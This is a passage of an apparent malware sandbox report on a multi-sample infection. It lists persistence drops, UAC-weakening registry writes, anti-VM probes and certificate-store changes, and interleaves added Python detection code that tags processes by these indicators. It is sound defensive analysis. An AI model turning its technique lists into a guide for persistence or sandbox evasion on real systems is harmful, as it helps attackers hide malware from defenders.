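
def score_log(lines):
    """Map each process that hit an indicator to (sorted categories, severity)."""
    seen = defaultdict(set)
    for line in lines:
        _, process, qname = parse_dns_line(line)
        category = categorize(qname)
        if category:
            seen[process].add(category)
    return {p: (sorted(c), severity(c)) for p, c in seen.items()}


SAMPLE_LOG = [  # constructed; not sandbox output
    r"2024-12-12T18:21:03Z C:\Users\Admin\AppData\Local\Temp\Files\a.exe 0.tcp.eu.ngrok.io",
    r"2024-12-12T18:21:05Z C:\Users\Admin\AppData\Local\Temp\Files\a.exe api.ipify.org",
    r"2024-12-12T18:21:09Z C:\Users\Admin\AppData\Local\Temp\Files\b.exe raw.githubusercontent.com",
    r"2024-12-12T18:21:10Z C:\Users\Admin\AppData\Local\Temp\Files\b.exe ip-api.com",
    r"2024-12-12T18:22:00Z C:\Program Files\Dev Tool\devtool.exe RAW.githubusercontent.com.",
    r"2024-12-12T18:22:30Z C:\Program Files\Dev Tool\devtool.exe notngrok.io",
    r"2024-12-12T18:23:00Z C:\Windows\System32\svchost.exe ctldl.windowsupdate.com",
]

if __name__ == "__main__":
    for process, (categories, verdict) in score_log(SAMPLE_LOG).items():
        print(f"{verdict:6} {process}  {', '.join(categories)}")
```

Correlating per process rather than per query is the point: the same ip-api.com lookup that is noise from an installed tool becomes meaningful when the same binary has just pulled content from raw.githubusercontent.com or opened a tunnel.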

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A
File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A
File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A
File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A
File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A
File created | C:\Windows\Tasks\defnur.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
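
The registry and file rows in this analysis (the UAC policy writes by reg.exe, the VirtualBox ACPI, BIOS-string and Wine probes, the Geo\Nation and NLS\Language lookups, the Run-key writes, the Startup-folder and Windows\Tasks drops, the Outlook profile sweep, and the NetSh reads above) are the raw material for detection logic. The Python below is an added example, not part of the sandbox report or of any tool it names: it parses rows of the same shape as the "Description Indicator Process Target" tables and assigns each process the technique its events imply. SAMPLE_ROWS are constructed copies shaped like rows from this report; the tag names, the rule patterns and the thresholds are this example's own choices.

```python
"""Map processes in a sandbox signature table to the techniques their registry
and file events imply.  Added example, not part of the report: the parser
follows the shape of the 'Description Indicator Process Target' rows above,
SAMPLE_ROWS are constructed copies of such rows, and the tag names and
thresholds are this example's own choices."""
import re

# Description column values that occur in the report's tables.
DESCRIPTIONS = (
    "Key opened", "Key queried", "Key value queried", "Key value enumerated",
    r"Set value \((?:int|str)\)", "File created", "File opened for modification",
)

# Columns are space separated and both the object and the process path may
# contain spaces, so a row is recognised by shape: a known description, a
# registry key or file path (optionally followed by = "value"), a process
# path starting with a drive letter, and the target column.
ROW_RE = re.compile(
    r"^(?P<desc>" + "|".join(DESCRIPTIONS) + r")\s+"
    r"(?P<obj>\\REGISTRY\\.+?|[A-Z]:\\.+?)"
    r'(?: = "(?P<value>.*?)")?'
    r"\s+(?P<process>[A-Z]:\\.+?)"
    r"\s+(?P<target>N/A|\S+)$"
)

# (tag, description pattern, object pattern, value pattern or None)
RULES = (
    ("uac_weakening", r"^Set value",
     r"\\Policies\\System\\(EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop)$", r"0"),
    ("anti_vm_virtualbox", r"^Key", r"\\HARDWARE\\ACPI\\DSDT\\VBOX__$", None),
    ("anti_vm_bios_strings", r"^Key", r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", None),
    ("anti_vm_wine", r"^Key", r"\\Software\\Wine$", None),
    ("geo_nation_check", r"^Key", r"\\Control Panel\\International\\Geo\\Nation$", None),
    ("system_language_check", r"^Key", r"\\Control\\NLS\\Language$", None),
    ("persistence_run_key", r"^Set value", r"\\CurrentVersion\\Run\\", None),
    ("persistence_startup_folder", r"^File", r"\\Start Menu\\Programs\\Startup\\", None),
    ("persistence_task_job", r"^File created", r"^C:\\Windows\\Tasks\\[^\\]+\.job$", None),
    # netsh.exe reads this key on every run to load its helper DLLs, so only a
    # write (which registers a new helper) is tagged.
    ("netsh_helper_registration", r"^Set value", r"\\Microsoft\\NetSh$", None),
)
OFFICE_PROFILE_RE = re.compile(r"\\Microsoft\\Office\\(\d+\.\d+)\\Outlook\\Profiles\\")


def parse_row(line):
    """Return the row's columns as a dict, or None if the line is not a row."""
    m = ROW_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_rows(lines):
    """Map every process seen in the rows to a sorted list of technique tags."""
    tags, office_versions = {}, {}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        bucket = tags.setdefault(row["process"], set())
        for tag, desc_re, obj_re, value_re in RULES:
            if not re.match(desc_re, row["desc"]) or not re.search(obj_re, row["obj"]):
                continue
            if value_re is not None and not re.fullmatch(value_re, row["value"] or ""):
                continue
            bucket.add(tag)
        m = OFFICE_PROFILE_RE.search(row["obj"])
        if m:
            office_versions.setdefault(row["process"], set()).add(m.group(1))
    # A stealer walks every plausible Office version (the report shows 13.0
    # through 20.0); a real mail client touches only the version it belongs to.
    for process, versions in office_versions.items():
        if len(versions) >= 3:
            tags[process].add("outlook_profile_sweep")
    return {process: sorted(found) for process, found in tags.items()}


SID = r"\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000"
OUTLOOK_KEY = SID + r"\Software\Microsoft\Office\{}\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
SAMPLE_ROWS = [  # constructed, shaped like the report's rows
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A',
    r"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A",
    "Key opened " + SID + r"\Software\Wine C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A",
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A',
    r"File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A",
    r"File created C:\Windows\Tasks\Hkbsse.job C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe N/A",
    r"Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A",
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A",
] + [
    "Key opened " + OUTLOOK_KEY.format(v) + r" C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A"
    for v in ("14.0", "15.0", "16.0", "19.0")
]

if __name__ == "__main__":
    for process, found in classify_rows(SAMPLE_ROWS).items():
        print(f"{process}: {', '.join(found) or '-'}")
```

Two caveats the rules encode. The NetSh rows in the table above are reads (Key opened, Key queried, Key value enumerated) performed by netsh.exe itself, which loads the helper DLLs listed under that key on every invocation; they show that netsh ran, consistent with the "Modifies Windows Firewall" signature, not that a helper was registered, which would be a Set value on that key from some other process. The NLS\Language tag is likewise noise on its own: the "System Language Discovery" rows below include cmd.exe, timeout.exe and schtasks.exe opening the same key, so it is only worth weighting alongside the Geo\Nation lookup from the same dropped binary.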

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2309417675.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\281730318.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fontdrvhost.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\steel.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\clip.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\builder.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\pp.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\262965725.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\crack.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\SysWOW64\fontdrvhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
